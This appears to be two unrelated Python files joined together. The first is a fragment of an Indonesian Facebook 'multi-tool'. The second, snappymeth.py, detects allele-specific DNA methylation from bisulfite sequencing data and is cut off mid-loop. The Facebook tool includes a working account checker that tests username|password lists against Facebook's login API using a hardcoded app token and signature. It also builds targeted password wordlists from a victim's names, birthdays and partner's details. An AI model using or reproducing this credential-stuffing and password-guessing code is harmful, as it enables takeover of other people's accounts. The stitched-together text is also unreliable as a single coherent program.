print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
snappymeth.py
|
#! /usr/bin/env python
from __future__ import division
from __future__ import print_function
def main():
import argparse
import pysam
import vcf
from pyfasta import Fasta
import os
import tempfile
import re
import pandas
from collections import OrderedDict
from fisher import pvalue
import sys
import gzip
import csv
from IGV import IGV
from multiprocessing import Process, Queue
complement = {'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A', 'N': 'N'}
def can_create_file(folder_path):
try:
tempfile.TemporaryFile(dir=folder_path)
return True
except OSError:
return False
def findCpGs(fafile, chrom, pos, distance):
minpos = 0 if pos<distance else pos-distance
sequence = fafile[chrom][minpos:pos+distance]
CpGs = [m.start() for m in re.finditer('CG', sequence, flags=re.IGNORECASE)]
return [x+minpos for x in CpGs]
def type_of_read(read):
# Work out where the methylation information is in the CpG site, and whether to complement it
# Depends on read1/read2 and forward/reverse status
if read.is_read1 and not read.is_reverse: # First, forward
offset = 0
to_complement = False
elif not read.is_read1 and read.is_reverse: # Second, reverse
offset = 0
to_complement = False
elif read.is_read1 and read.is_reverse: # First, reverse
offset = 1
to_complement = True
elif not read.is_read1 and not read.is_reverse: # Second, forward
offset = 1
to_complement = True
return offset, to_complement
def IGV_reader(queue):
## Read from the queue
while True:
msg = queue.get() # Read from the queue and do nothing
if (msg == 'DONE'):
break
chrom, pos, ref, alt, ref_filename, alt_filename = msg.split(",")
pos = int(pos)
png_filename = os.path.basename("%s.%s.%s.%s.%s.png" % (args.prefix, chrom, pos, ref, alt))
igv.load("file://"+os.path.abspath(ref_filename))
igv.load("file://"+os.path.abspath(alt_filename))
igv.go("%s:%s-%s" % (chrom, pos-250, pos+250))
igv.send("collapse")
igv.send("region %s %s %s" % (chrom, pos+1, pos+2)) # 1 based co-ordinates for IGV
igv.save(png_filename)
igv.clear()
def exportBAMs(chrom, pos, ref, alt, minpos, maxpos, ref_readnames, alt_readnames):
ref_filename = "%s.%s.%s.ref.%s.bam" % (args.prefix, chrom, pos, ref)
ref_bam = pysam.AlignmentFile(ref_filename, "wb", template=samfile)
alt_filename = "%s.%s.%s.alt.%s.bam" % (args.prefix, chrom, pos, alt)
alt_bam = pysam.AlignmentFile(alt_filename, "wb", template=samfile)
for read in samfile.fetch(chrom, minpos, maxpos):
if read.query_name in ref_readnames:
ref_bam.write(read)
elif read.query_name in alt_readnames:
alt_bam.write(read)
ref_bam.close()
alt_bam.close()
pysam.index(ref_filename)
pysam.index(alt_filename)
if args.IGV_screenshot:
IGV_queue.put("%s,%s,%s,%s,%s,%s" % (chrom, pos, ref, alt, ref_filename, alt_filename))
def processReadsAtPosition(chrom, pos, ref, alt, CpGs, ref_readnames, alt_readnames, min_coverage,
min_region_CpGs):
# PASS 2 - iterate through the CpG sites around the SNP, and count C/Ts in REF/ALT in reads
CpGs_bases = pandas.DataFrame(OrderedDict([
('SNP.chr', chrom),
('SNP.pos', pos),
('SNP.ref', ref),
('SNP.alt', alt),
('CpG.pos', CpGs),
('ref.A', 0),
('ref.C', 0),
('ref.G', 0),
('ref.T', 0),
('ref.N', 0),
('alt.A', 0),
('alt.C', 0),
('alt.G', 0),
('alt.T', 0),
('alt.N', 0)]))
for read in samfile.fetch(chrom, CpGs[0]-1, CpGs[len(CpGs)-1]+1): # extra 1bp buffer
# Is this a REF, ALT or neither read?
if read.query_name in ref_readnames:
read_type = 'ref.'
elif read.query_name in alt_readnames:
read_type = 'alt.'
else:
read_type = None
if read_type is not None:
offset, to_complement = type_of_read(read)
# Iterate through all aligned read positions, and store methylation calls
for pair in read.get_aligned_pairs():
if pair[0] is not None and pair[1] is not None:
try:
i = CpGs.index(pair[1]-offset)
this_base = read.query_sequence[pair[0]]
if to_complement:
this_base = complement[this_base]
CpGs_bases.ix[i, read_type+this_base] += 1
except ValueError:
pass
# Subset to rows with minimum coverage
# Calculate coverage and methylation per CpG site
CpGs_bases["ref.cov"] = [CpGs_bases.loc[i, ["ref.C", "ref.T"]].sum() for i in CpGs_bases.index]
CpGs_bases["alt.cov"] = [CpGs_bases.loc[i, ["alt.C", "alt.T"]].sum() for i in CpGs_bases.index]
CpGs_bases = CpGs_bases[CpGs_bases["ref.cov"] >= min_coverage]
CpGs_bases = CpGs_bases[CpGs_bases["alt.cov"] >= min_coverage]
if len(CpGs_bases.index)>0: # If rows are left
CpGs_bases["ref.meth"] = [CpGs_bases["ref.C"][i] / CpGs_bases["ref.cov"][i] for i in CpGs_bases.index]
CpGs_bases["alt.meth"] = [CpGs_bases["alt.C"][i] / CpGs_bases["alt.cov"][i] for i in CpGs_bases.index]
CpGs_bases["meth.diff"] = [CpGs_bases["ref.meth"][i] - CpGs_bases["alt.meth"][i] for i in CpGs_bases.index]
# Calculate fisher pvalue per CpG site
CpGs_bases["pvalue"] = [pvalue(*CpGs_bases.loc[i, ["ref.C", "ref.T", "alt.C", "alt.T"]].tolist()).two_tail for i in CpGs_bases.index]
# Export sites table
CpGs_bases.to_csv(out_sites, header=False, index=False)
if len(CpGs_bases.index) >= min_region_CpGs: # If >=3 CpG sites, calculate fisher pvalue for pool for region and export
output = "%s,%s,%s,%s,%s,%s,%s," % (
chrom, pos, ref, alt, # SNP position
CpGs_bases["CpG.pos"].tolist()[0], CpGs_bases["CpG.pos"].tolist()[-1], # First and last CpG sites of region
len(CpGs_bases.index)) # Number of CpG sites in region
# Sums of counts across the region
CpGs_sums = CpGs_bases[["ref.C", "ref.T", "alt.C", "alt.T", "ref.cov", "alt.cov"]].sum(0).tolist()
output += "%s,%s,%s,%s,%s,%s," % tuple(CpGs_sums)
# Methylation ratios and pvalue
ref_meth = CpGs_sums[0] / CpGs_sums[4]
alt_meth = CpGs_sums[1] / CpGs_sums[5]
meth_diff = ref_meth-alt_meth
p_value = pvalue(*CpGs_sums[0:4]).two_tail
output += "%s,%s,%s,%s\n" % (ref_meth, alt_meth, meth_diff, p_value)
# Export row for this region
out_regions.write(output)
# Export BAM per allele if feature is turned on and region meets fisher_cutoff
if args.region_bams and p_value <= args.fisher_cutoff:
print(" - Regional fisher exact p_value: %s - exporting BAMs" % p_value)
exportBAMs(chrom, pos, ref, alt, CpGs[0]-1, CpGs[len(CpGs)-1]+1,
ref_readnames, alt_readnames)
def processCpG(chrom, pos, cutoff_mapq, cutoff_baseq):
"""
Find readnames of all reads that are meth or unmeth at the specified CpG position
"""
M_readnames = set()
U_readnames = set()
n_mapq = 0
n_baseq = 0
for pileup in samfile.pileup(chrom, pos, pos+1):
if pileup.reference_pos == pos: # filter for position of interest
print("Processing %s reads covering CpG position %s:%s" % (
len(pileup.pileups), chrom, pos))
for read in pileup.pileups:
# read mapping quality filter
if read.alignment.mapping_quality >= cutoff_mapq:
n_mapq += 1
offset, to_complement = type_of_read(read.alignment)
if read.query_position + offset < len(read.alignment.query_sequence):
CpG_base = read.alignment.query_sequence[read.query_position + offset]
if to_complement:
CpG_base = complement[CpG_base]
CpG_qual = read.alignment.query_qualities[read.query_position + offset]
# base quality score filter @ SNP position
if CpG_qual >= cutoff_baseq:
n_baseq += 1
if CpG_base == "C":
M_readnames.add(read.alignment.query_name)
elif CpG_base == "T":
U_readnames.add(read.alignment.query_name)
print(" - Found %s reads passing mapping quality filter of %s" % (n_mapq, cutoff_mapq))
print(" - Found %s reads passing base quality filter of %s" % (n_baseq, cutoff_baseq))
print(" - Found %s reads with M allele" % len(M_readnames))
print(" - Found %s reads with U allele" % len(U_readnames))
# Remove reads in both
M_and_U = M_readnames.intersection(U_readnames)
if len(M_and_U) > 0:
print(" - %s reads discarded for being ambiguous" % len(M_and_U))
M_readnames = M_readnames.difference(M_and_U)
U_readnames = U_readnames.difference(M_and_U)
return M_readnames, U_readnames
def processSNP(chrom, pos, ref, alt, cutoff_mapq, cutoff_baseq):
"""
Find readnames of all reads with REF and ALT alleles
"""
ref_readnames = set()
alt_readnames = set()
n_mapq = 0
n_baseq = 0
for pileup in samfile.pileup(chrom, pos, pos+1):
if pileup.reference_pos == pos: # filter for position of interest
print("Processing %s reads covering SNP position %s:%s" % (
len(pileup.pileups), chrom, pos))
for read in pileup.pileups:
# read mapping quality filter
if read.alignment.mapping_quality >= cutoff_mapq:
n_mapq += 1
SNP_base = read.alignment.query_sequence[read.query_position]
SNP_qual = read.alignment.query_qualities[read.query_position]
# base quality score filter @ SNP position
if SNP_qual >= cutoff_baseq:
n_baseq += 1
if SNP_base == ref:
ref_readnames.add(read.alignment.query_name)
elif SNP_base == alt:
alt_readnames.add(read.alignment.query_name)
print(" - Found %s reads passing mapping quality filter of %s" % (n_mapq, cutoff_mapq))
print(" - Found %s reads passing base quality filter of %s" % (n_baseq, cutoff_baseq))
print(" - Found %s reads matching '%s' REF allele" % (len(ref_readnames), ref))
print(" - Found %s reads matching '%s' ALT allele" % (len(alt_readnames), alt))
# Remove reads in both
ref_and_alt = ref_readnames.intersection(alt_readnames)
if len(ref_and_alt) > 0:
print(" - %s reads discarded for being ambiguous" % len(ref_and_alt))
ref_readnames = ref_readnames.difference(ref_and_alt)
alt_readnames = alt_readnames.difference(ref_and_alt)
return ref_readnames, alt_readnames
## Entry point
parser = argparse.ArgumentParser(description="snappymeth.py - "
"Discover sites and regions of allele specific methylation from whole genome bisulfite "
"sequencing data by counting CpG methylation on alleles separately. Reads can be "
"separated by either a heterozygous SNP (when a VCF is supplied), or by the methylation "
"status of a single CpG site. Both analyses modes require sufficient sequencing coverage "
"of both alleles (default is 10x).")
parser.add_argument("input_file", help="Input VCF/CpG sites file, gzip compressed." )
parser.add_argument("input_bam", help="Input BAM file")
parser.add_argument("reference", help="Reference FASTA file")
parser.add_argument("prefix", help="Prefix for all output files - the sites and regions output csvs, "
"regional BAMs and IGV screenshots")
parser.add_argument("--input_type", choices=("VCF", "CpGs"), default="VCF", help="Whether the "
"input_file is a VCF (default) or a csv of methylation counts at CpG sites with the format "
"'chr,position,M,U' where the fields are chromosome name, 0-based position of the CpG site, "
"count of methylated bases sequenced at this site and count of unmethylated bases sequenced.")
parser.add_argument("--VCF_sample", default="0", help="The sample in the VCF to be processed - "
"either as the sample name or numeric index (0-based). Default is 0, the first sample.")
parser.add_argument("--pair_distance", type=int, default=500, help="The distance in "
"basepairs to search up and downstream from each position (default is 500).")
parser.add_argument("--max_depth", type=int, default=100, help="Maximum number "
"of reads allowed at a position to try and filter out repeat reads (default is 100)..")
parser.add_argument("--min_per_allele", type=int, default=5, help="Minimum number "
"of reads containing each allele to process a position.")
parser.add_argument("--min_sites_in_region", type=int, default=3, help="Minimum number "
"of CpG sites linked to a SNP to perform a regional analysis.")
parser.add_argument("--min_mapping_quality", type=int, default=40, help="Minimum mapping "
"quality score for a read to be considered.")
parser.add_argument("--min_base_quality", type=int, default=30, help="Minimum basecall "
"quality score at the SNP for a read to be considered.")
parser.add_argument("--region_bams", default=False, action='store_true', help="Specity to output "
"BAM files per allele when the regional fisher exact p-value is less than the cutoff "
"specified by --fisher_cutoff.")
parser.add_argument("--fisher_cutoff", type=float, default=0.0001, help="Regional fisher exact "
"p-value cutoff for a regional BAM to be created/IGV screenshot be taken (default is 0.0001).")
parser.add_argument("--IGV_screenshot", default=False, action='store_true', help="Specity to take "
"IGV screenshots of each region that passes --fisher_cutoff. Requires that IGV be running on "
"the local machine and listening on port 60151")
args = parser.parse_args()
# Check input files exists, and thet output folder is writeable
if not os.path.isfile(args.input_file):
print("Input file %s does not exist!" % args.input_file)
return
if not os.path.isfile(args.input_bam):
print("Input BAM file %s does not exist!" % args.input_bam)
return
if not os.path.isfile(args.reference):
print("Reference FASTA file %s does not exist!" % args.reference)
return
if not can_create_file(os.path.dirname(args.prefix)):
print("Output directory %s/ is not writable!" % os.path.dirname(args.prefix))
return
# Setup for IGV
if args.IGV_screenshot:
args.region_bams = True
igv = IGV()
igv.clear()
print("BAMs and IGV screenshots will be saved in %s" % os.path.dirname(os.path.abspath(args.prefix)))
igv.set_path(os.path.dirname(os.path.abspath(args.prefix)))
# Setup queue for IGV screenshots in separate process
print("Starting separate process for IGV screenshots")
IGV_queue = Queue()
reader_process = Process(target=IGV_reader, args=((IGV_queue),))
reader_process.daemon = True
reader_process.start() # Launch IGV_reader() as a separate python process
# Open the reference fasta file
print("Loading %s" % args.reference)
fafile = Fasta(args.reference)
# Index samfile if one does not already exist
samfile = pysam.AlignmentFile(args.input_bam, "rb")
if not samfile._hasIndex():
print("BAM file '%s' does not have an index, creating one..." % args.input_bam)
samfile.close()
pysam.index(args.input_bam)
samfile = pysam.AlignmentFile(args.input_bam, "rb")
# Open the output files and write headers
out_sites = open(args.prefix + ".sites.csv", "w")
out_sites.write("SNP.chr,SNP.pos,SNP.ref,SNP.alt,CpG.pos,ref.A,ref.C,ref.G,ref.T,ref.N,"
"alt.A,alt.C,alt.G,alt.T,alt.N,ref.cov,alt.cov,ref.meth,alt.meth,meth.diff,p.value\n")
out_regions = open(args.prefix + ".regions.csv", "w")
out_regions.write("SNP.chr,SNP.pos,SNP.ref,SNP.alt,first.CpG,last.CpG,nCG,ref.C,ref.T,alt.C,alt.T,"
"ref.cov,alt.cov,ref.meth,alt.meth,meth.diff,p.val\n")
if args.input_type=="VCF": # VCF analysis
# Open the VCF file
vcffile = vcf.Reader(filename=args.input_file, compressed=True)
# Check VCF_sample validity
if args.VCF_sample.isdigit(): # If a number convert to int
args.VCF_sample = int(args.VCF_sample)
if isinstance(args.VCF_sample, basestring):
try:
sample_no = vcffile.samples.index(args.VCF_sample)
except ValueError:
sys.exit("Sample %s not found in VCF!" % args.VCF_sample)
elif not args.VCF_sample < len(vcffile.samples):
sys.exit("Sample number %s not found in VCF!" % args.VCF_sample)
else:
sample_no = args.VCF_sample
print("Processing sample no %s (%s) from VCF" % (sample_no, vcffile.samples[sample_no]))
# Iterate through the VCF
for record in vcffile:
